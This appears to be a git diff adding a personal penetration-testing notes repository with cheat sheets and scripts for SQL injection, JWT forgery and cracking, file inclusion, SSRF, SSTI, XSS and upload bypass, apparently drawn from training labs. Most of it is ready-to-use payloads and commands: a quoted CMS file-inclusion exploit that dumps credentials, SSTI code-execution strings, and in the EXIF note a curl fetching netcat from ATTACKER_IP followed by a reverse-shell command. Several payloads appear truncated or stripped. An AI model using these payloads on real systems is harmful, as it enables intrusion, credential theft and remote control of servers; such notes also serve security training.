@@ +# smbmap + +* [Repo](https://github.com/ShawnDEvans/smbmap.git) +* `python3 -m pip install -r requirements.txt` + +# Usage +* `-x` execute command on server +* `-s` enumerate share + +```sh +smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig' +``` diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md new file mode 100644 index 0000000..00efb8a --- /dev/null +++ b/exploit/sqli/sqli.md @@ -0,0 +1,86 @@ +# SQL Injection + +# Finding an Opportunity +* GET parameter +```sh +http://example.com/index.php?id=' or 1=1 -- - +``` +* Provoke error to gain information +```sh +http://example.com/index.php?id=' +``` + +# Usage + +* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--` +```sql +SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- - +SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+ +``` + +* Boolean True and False +```sql +SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+ +SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ +``` + +* Blind injection // Guessing characters +```sh +http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ +``` + +### Union based +* Check number of cols +```sql +' UNION SELECT NULL-- +' UNION SELECT NULL,NULL-- +' UNION SELECT NULL,NULL,NULL-- +# until the error occurs +``` +* Check which one is a string +```sql +' UNION SELECT 'a',NULL,NULL,NULL-- +' UNION SELECT NULL,'a',NULL,NULL-- +' UNION SELECT NULL,NULL,'a',NULL-- +' UNION SELECT NULL,NULL,NULL,'a'-- +``` +* Retrieve content, for cols and comment two times as an example. Or dump database +```sql +' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- // +' UNION SELECT NULL,username,password,NULL FROM users -- // +``` + +* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection) + +## Tools +### SQLmap +* [sqlmap](https://github.com/sqlmapproject/sqlmap.git) +* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) +* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet) +* Use `-r` with a saved HTTP request +```sh +sqlmap -r request.txt --dbms=mysql --dump +sqlmap -r request.txt --batch +``` + + +|Parameter|Details| +|-r|Uses the intercepted request save as a file| +|--dbms|DBMS of target| +|--dump|Dump the entire database| +|--dump-all|Dump everything| +|-p |TESTPARAMETER| +|--os-shell|Prompt for an interactive operating system shell| +|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC| + +### Damn Small SQLi Scanner (DSSS) +* [Script](https://github.com/stamparm/DSSS.git) +```sh +python dsss.py -u "http://example.com/index.php?id=" +``` + +### Online sqlmap +* [Link](https://suip.biz/?act=sqlmap) + +## Payloads +* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads) diff --git a/exploit/sudo/CVE_2019_18634.md b/exploit/sudo/CVE_2019_18634.md new file mode 100644 index 0000000..a78fb18 --- /dev/null +++ b/exploit/sudo/CVE_2019_18634.md @@ -0,0 +1,4 @@ +# Sudo pwnge with pwfeedback() + +* Sudo version 1.7.1 to 1.8.30 +* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634) diff --git a/exploit/web/beef b/exploit/web/beef new file mode 160000 index 0000000..15af383 --- /dev/null +++ b/exploit/web/beef @@ -0,0 +1 @@ +Subproject commit 15af383355e87428a54251664feca7004a21e291 diff --git a/exploit/web/csrf.md b/exploit/web/csrf.md new file mode 100644 index 0000000..435546d --- /dev/null +++ b/exploit/web/csrf.md @@ -0,0 +1 @@ +# CSRF diff --git a/exploit/web/forced_browsing/forced_browsing.md b/exploit/web/forced_browsing/forced_browsing.md new file mode 100644 index 0000000..346fa01 --- /dev/null +++ b/exploit/web/forced_browsing/forced_browsing.md @@ -0,0 +1,23 @@ +# Forced Browsing +Forced browsing is the art of using logic to find resources on the website that you would not normally be able to access. For example let's say we have a note taking site, that is structured like this. http://example.com/user1/note.txt. It stands to reason that if we did http://example.com/user2/note.txt we may be able to access user2's note. + +## Usage + +## Tools + +### wfuzz +* `pip install wfuzz` + +``` +wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hw 57 http://10.10.28.2/FUZZ/note.txt +``` + +|Parameter|Detail| +|---------|------| +|-c|Shows the output in color| +|-z|Specifies what will replace FUZZ in the request. For example -z file,big.txt will read through all the lines of big.txt and replace FUZZ with| +|--hc|Don't show certain http response codes| +|--hl|Don't show a certain amount of lines in the response| +|--hh|Don't show a certain amount of words| +|--hw|Don't show word response return val of this length| + diff --git a/exploit/web/idor/idor.md b/exploit/web/idor/idor.md new file mode 100644 index 0000000..52f29d3 --- /dev/null +++ b/exploit/web/idor/idor.md @@ -0,0 +1,3 @@ +# Insecure Direct Object Reference (IDOR) + +Changing URL parameters. diff --git a/exploit/web/jwt/jwt-cracker b/exploit/web/jwt/jwt-cracker new file mode 160000 index 0000000..8822dd2 --- /dev/null +++ b/exploit/web/jwt/jwt-cracker @@ -0,0 +1 @@ +Subproject commit 8822dd26550174eaa80f3cc7b0b023d0aad52c61 diff --git a/exploit/web/jwt/jwt.md b/exploit/web/jwt/jwt.md new file mode 100644 index 0000000..4768c79 --- /dev/null +++ b/exploit/web/jwt/jwt.md @@ -0,0 +1,88 @@ +# JSON Web Token + +## Build up +```sh +header.payload.signature +``` + +1. **Header**: This consists of the algorithm used and the type of the token. +```sh +{ "alg": "HS256", "typ": "JWT"} +``` + +2. **Payload**: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details. + + +3. **Signature**: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to) + + +## NONE Algorithm Vulnerability +* Example with `alg: NONE`, so no third part is needed. +```sh +eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K. +``` +* Encoded headers are as follows + * `{"type": "JWT", "alg": "none"}` + ``` + eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0 + ``` + * `{"typ":"JWT","alg":"NONE"}` with trailing `\n` + ``` + eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K + ``` + +## Brute Force +```python +HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret) +``` +* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git) + +|Parameter|Details| +|---------|-------| +|Token | The HS256 JWT Token| +|Alphabet |Alphabet used to crack (default:"abcdefghijklmnopqrstuvwxyz")| +|max-length|Secret max length (default: 12)| + +```sh +[whackx@manbox jwt-cracker]$ node index.js eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4 +Attempts: 100000 +Attempts: 200000 +Attempts: 300000 +SECRET FOUND: pass +Time taken (sec): 11.605 +Attempts: 346830 +``` +## HS256 Vulnerability +It is calculated by using server `K_pub`, which may be gained via content of the server cert + +### Build Up +* Changing the header to `{"typ": "JWT", "alg": "HS256"}`, spaces inbetween values. +```sh +$ echo -n '{"typ": "JWT", "alg": "HS256"}' | base64 +eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9 +``` + +* Encoding the payload, no spaces inbetween. Cut `==` at the end. +```sh +echo -n '{"iss":"http://localhost","iat":1585323784,"exp":1585323904,"data":{"hello":"world"}}' | base64 +eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ== +``` + +* Crafting the HMAC signature + * Convert `K_pub` file to hex + ```sh + cat id_rsa.pub | xxd -p | tr -d "\\n" + ``` + * Sign the message to get the signature as hex value + ```sh + echo -n "eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey + ``` + * Decode hex to binary data and reencode as base64 via python + ```python + python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('')).replace('=','')\")" + ``` + +## Tools +* [JWTtool](https://github.com/ticarpi/jwt_tool.git) +* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token) +* https://jwt.io diff --git a/exploit/web/jwt/jwt_tool b/exploit/web/jwt/jwt_tool new file mode 160000 index 0000000..c765a2e --- /dev/null +++ b/exploit/web/jwt/jwt_tool @@ -0,0 +1 @@ +Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da diff --git a/exploit/web/jwt_header b/exploit/web/jwt_header new file mode 100644 index 0000000..2b81565 --- /dev/null +++ b/exploit/web/jwt_header @@ -0,0 +1 @@ +{"typ": "JWT", "alg": "HS256"} diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md new file mode 100644 index 0000000..fa5c97f --- /dev/null +++ b/exploit/web/local_file_inclusion.md @@ -0,0 +1,19 @@ +# Local File Inclusion +To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt). + +## Usage + +* Exploit URL parameter +``` +http://example.com/home?page=about.html +``` + * changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks) + ``` + http://example.com/home?page=../../../../etc/passwd + ``` + or + ``` + http://example.com/home?page=../../../../home//.ssh/id_rsa + ``` + + diff --git a/exploit/web/methodology.md b/exploit/web/methodology.md new file mode 100644 index 0000000..fd3e0f2 --- /dev/null +++ b/exploit/web/methodology.md @@ -0,0 +1,17 @@ +We'll look at this as a step-by-step process. Let's say that we've been given a website to perform a security audit on. + +1. The first thing we would do is take a look at the website as a whole. Using browser extensions such as the aforementioned Wappalyzer (or by hand) we would look for indicators of what languages and frameworks the web application might have been built with. Be aware that Wappalyzer is not always 100% accurate. A good start to enumerating this manually would be by making a request to the website and intercepting the response with Burpsuite. Headers such as server or x-powered-by can be used to gain information about the server. We would also be looking for vectors of attack, like, for example, an upload page. +2. Having found an upload page, we would then aim to inspect it further. Looking at the source code for client-side scripts to determine if there are any client-side filters to bypass would be a good thing to start with, as this is completely in our control. +3. We would then attempt a completely innocent file upload. From here we would look to see how our file is accessed. In other words, can we access it directly in an uploads folder? Is it embedded in a page somewhere? What's the naming scheme of the website? This is where tools such as Gobuster might come in if the location is not immediately obvious. This step is extremely important as it not only improves our knowledge of the virtual landscape we're attacking, it also gives us a baseline "accepted" file which we can base further testing on. + * An important Gobuster switch here is the -x switch, which can be used to look for files with specific extensions. For example, if you added -x php,txt,html to your Gobuster command, the tool would append .php, .txt, and .html to each word in the selected wordlist, one at a time. This can be very useful if you've managed to upload a payload and the server is changing the name of uploaded files. +4. Having ascertained how and where our uploaded files can be accessed, we would then attempt a malicious file upload, bypassing any client-side filters we found in step two. We would expect our upload to be stopped by a server side filter, but the error message that it gives us can be extremely useful in determining our next steps. + + +Assuming that our malicious file upload has been stopped by the server, here are some ways to ascertain what kind of server-side filter may be in place: + + * If you can successfully upload a file with a totally invalid file extension (e.g. testingimage.invalidfileextension) then the chances are that the server is using an extension blacklist to filter out executable files. If this upload fails then any extension filter will be operating on a whitelist. + * Try re-uploading your originally accepted innocent file, but this time change the magic number of the file to be something that you would expect to be filtered. If the upload fails then you know that the server is using a magic number based filter. + * As with the previous point, try to upload your innocent file, but intercept the request with Burpsuite and change the MIME type of the upload to something that you would expect to be filtered. If the upload fails then you know that the server is filtering based on MIME types. + * Enumerating file length filters is a case of uploading a small file, then uploading progressively bigger files until you hit the filter. At that point you'll know what the acceptable limit is. If you're very lucky then the error message of original upload may outright tell you what the size limit is. Be aware that a small file length limit may prevent you from uploading the reverse shell we've been using so far. + + diff --git a/exploit/web/php_image_exif.md b/exploit/web/php_image_exif.md new file mode 100644 index 0000000..3a31090 --- /dev/null +++ b/exploit/web/php_image_exif.md @@ -0,0 +1,35 @@ +# PHP Payload in Image ExifData + +* Test +```sh +exiftool -Comment="Test Payload\"; die(); ?>" test-USERNAME.jpeg.php +``` + +* Build Payload with AV evasion +```sh +" . shell_exec($cmd) . ""; + } + die(); +?> +``` + +* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator) + +* Obfuscated code with escaped `$` +```sh + +``` +* Upload and execute commands with get parameter `?wreath=systeminfo` + +## Uploading Reverse through Webshell +* Parameter for Webshell +```sh +curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe +``` +* Trigger uploaded netcat +```sh +powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe +``` diff --git a/exploit/web/re_registration.md b/exploit/web/re_registration.md new file mode 100644 index 0000000..bb5db62 --- /dev/null +++ b/exploit/web/re_registration.md @@ -0,0 +1,9 @@ +# Re-registration + +Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin. + +# Usage +* Re-register. The name is taken, that's the point, but alter the string +``` + try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve. +``` diff --git a/exploit/web/remote_file_inclusion.txt b/exploit/web/remote_file_inclusion.txt new file mode 100644 index 0000000..a035a70 --- /dev/null +++ b/exploit/web/remote_file_inclusion.txt @@ -0,0 +1,87 @@ +# Exploit Title : Cuppa CMS File Inclusion +# Date : 4 June 2013 +# Exploit Author : CWH Underground +# Site : www.2600.in.th +# Vendor Homepage : http://www.cuppacms.com/ +# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip +# Version : Beta +# Tested on : Window and Linux + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +#################################### +VULNERABILITY: PHP CODE INJECTION +#################################### + +/alerts/alertConfigField.php (LINE: 22) + +----------------------------------------------------------------------------- +LINE 22: + +----------------------------------------------------------------------------- + + +##################################################### +DESCRIPTION +##################################################### + +An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise. + +http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI] + +##################################################### +EXPLOIT +##################################################### + +http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt? +http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd + +Moreover, We could access Configuration.php source code via PHPStream + +For Example: +----------------------------------------------------------------------------- +http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php +----------------------------------------------------------------------------- + +Base64 Encode Output: +----------------------------------------------------------------------------- +PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+ +----------------------------------------------------------------------------- + +Base64 Decode Output: +----------------------------------------------------------------------------- + +----------------------------------------------------------------------------- + +Able to read sensitive information via File Inclusion (PHP Stream) + +################################################################################################################ + Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 +################################################################################################################ \ No newline at end of file diff --git a/exploit/web/ssrf/check_ssrf.py b/exploit/web/ssrf/check_ssrf.py new file mode 100644 index 0000000..76700b5 --- /dev/null +++ b/exploit/web/ssrf/check_ssrf.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python + +import requests + +s = requests.Session() + +t = [] +j = 0 +for i in range(1, 65536): + r = s.get(f"http://10.10.214.67:8000/attack?url=http%3A%2F%2F0xa0a0a05%3A{i}") + print(r.text) + if "Target is not reachable!" in r.text: + print(f"{i} is reachable, sum is {j}") + t.append(f"Port {i}, {r.text}") + else: + print (f"{i} not reachable") +print(t) diff --git a/exploit/web/ssrf/curl.sh b/exploit/web/ssrf/curl.sh new file mode 100644 index 0000000..2f492aa --- /dev/null +++ b/exploit/web/ssrf/curl.sh @@ -0,0 +1,8 @@ +#!/usr/bin/env bash +for x in {1..65535}; + do cmd=$(curl -so /dev/null http://10.10.214.67:8000/attack?url=http://2130706433:${x} \ + -w '%{size_download}'); + if [ $cmd != 1045 ]; then + echo "Open port: $x" + fi +done diff --git a/exploit/web/ssrf/ip2dh.py b/exploit/web/ssrf/ip2dh.py new file mode 100644 index 0000000..6a82168 --- /dev/null +++ b/exploit/web/ssrf/ip2dh.py @@ -0,0 +1,31 @@ +""" +u can run this in the following format: +For decimal: python3 ip2dh.py D +For Hexadecimal: python3 ip2dh.py H +""" +#!/usr/bin/python3 + +import sys + +if len(sys.argv) < 3: + print('\nYou must give desired format and IPv4 address as input...') + print('e.g.: D 192.168.10.100') + print('Valid formats D=Decimal H=Hexadecimal\n') + sys.exit(1) + +Format = sys.argv[1] + +def long(ip): + IP = ip.split('.') + IP = list(map(int, IP)) + LongIP = IP[0]*2**24 + IP[1]*2**16 + IP[2]*2**8 + IP[3] + return LongIP + +ip = long(sys.argv[2]) + +if Format == 'D': + print('\nIP as Decimal format: %s' % (ip)) + +if Format == 'H': + print('\nIP as Hexadecimal format: %s' % (hex(ip))) + diff --git a/exploit/web/ssrf/ssrf.md b/exploit/web/ssrf/ssrf.md new file mode 100644 index 0000000..3e96e80 --- /dev/null +++ b/exploit/web/ssrf/ssrf.md @@ -0,0 +1,26 @@ +# Server Side Request Forgery (SSRF) +is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls. + +## Usage + +### Sanity Test Service +Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports. +``` +http://127.0.0.1:3306 +http://localhost:5432 +http://0.0.0.0:53 +``` +* IPv6 +``` +http://[::]:3306 +http://:::3006 +``` +* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72) + +### Reading files +``` +file:///etc/passwd +``` + +### Tools +* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file) diff --git a/exploit/web/ssti/ssti.md b/exploit/web/ssti/ssti.md new file mode 100644 index 0000000..926a000 --- /dev/null +++ b/exploit/web/ssti/ssti.md @@ -0,0 +1,59 @@ +# Server Side Template Injection (SSTI) +Pass in parameters to control the template. + +## Usage +* Sanity test +```python +{{2+2}} +``` + +* Flask template LFI +```python +{{ ''.__class__.__mro__[2].__subclasses__()[40]()().read()}} +``` + +* Executing commands +```sh +{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }} +``` + +* RCE on server +```python +{{config.__class__.__init__.__globals__['os'].popen().read()}} +``` + +## Identification of Template Engine +Identify via payload checking +* Smarty: `a{*comment*}b` +* Mako: `${"z".join("ab")}` +* Twig or Jinja2 +```sh +{{7*7}} +{{7*'7'}} +``` + +## Tools +### TPlmap +```sh +git clone https://github.com/epinna/tplmap.git +pip2 install -r requirements +``` + +|HTTP Method|Parameter| +|-----------|---------| +|GET|`tplmap -u /?`| +|POST|`tplmap -u -d ''`| + +* Using remote command +``` +tplmap -u http://:/ -d '' --os-cmd "cat /etc/passwd" +``` + +### Countermeasure +* Remove everything in user input but alnum. Passing data, not data to f-string. +```python +input = re.sub("[^A-Za-z0-9]", "", input) +template = "User input is {{ input }}" +return render_template_string(template, input=input) +``` + diff --git a/exploit/web/ssti/tplmap b/exploit/web/ssti/tplmap new file mode 160000 index 0000000..1d63156 --- /dev/null +++ b/exploit/web/ssti/tplmap @@ -0,0 +1 @@ +Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98 diff --git a/exploit/web/url_forgery.md b/exploit/web/url_forgery.md new file mode 100644 index 0000000..7d0ce82 --- /dev/null +++ b/exploit/web/url_forgery.md @@ -0,0 +1,3 @@ +# URL Forgery + +* Just change parts of the URL diff --git a/exploit/web/xss.md b/exploit/web/xss.md new file mode 100644 index 0000000..e7fea4c --- /dev/null +++ b/exploit/web/xss.md @@ -0,0 +1,106 @@ +# Cross-Site Scripting +A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS. + +## Stored XSS +This is where a malicious string originates from the websites database. + +### Examples +* Sanity test by changing DOM content +``` + +``` + +* Cookie stealing + +``` + +``` + * Navigte to `/logs` and take sid + +## Reflected XSS +In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload. + +### Usage +As script inside parameter +```sh +http://example.com/search?keyword= +``` +* Show server IP +``` +http://example.com/reflected?keyword= +``` + +## DOM based XSS +With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so: +```javascript +var keyword = document.querySelector('#search') +keyword.innerHTML = +``` + +### Usage +* Find the sub-object inside the document +```javascript +test" onmouseover="alert('YO!')" +``` +* Show cookie +``` +test" onmouseover="alert(document.cookie)" +``` +## Bypass Filters +* `script>alert("1")</script> +``` +* `alert()` sanitizing +```javascript +0\"autofocus/onfocus=alert(1)-->"-confirm(3)-" +``` +or +```javascript +0\"autofocus/onfocus=alert(1)-->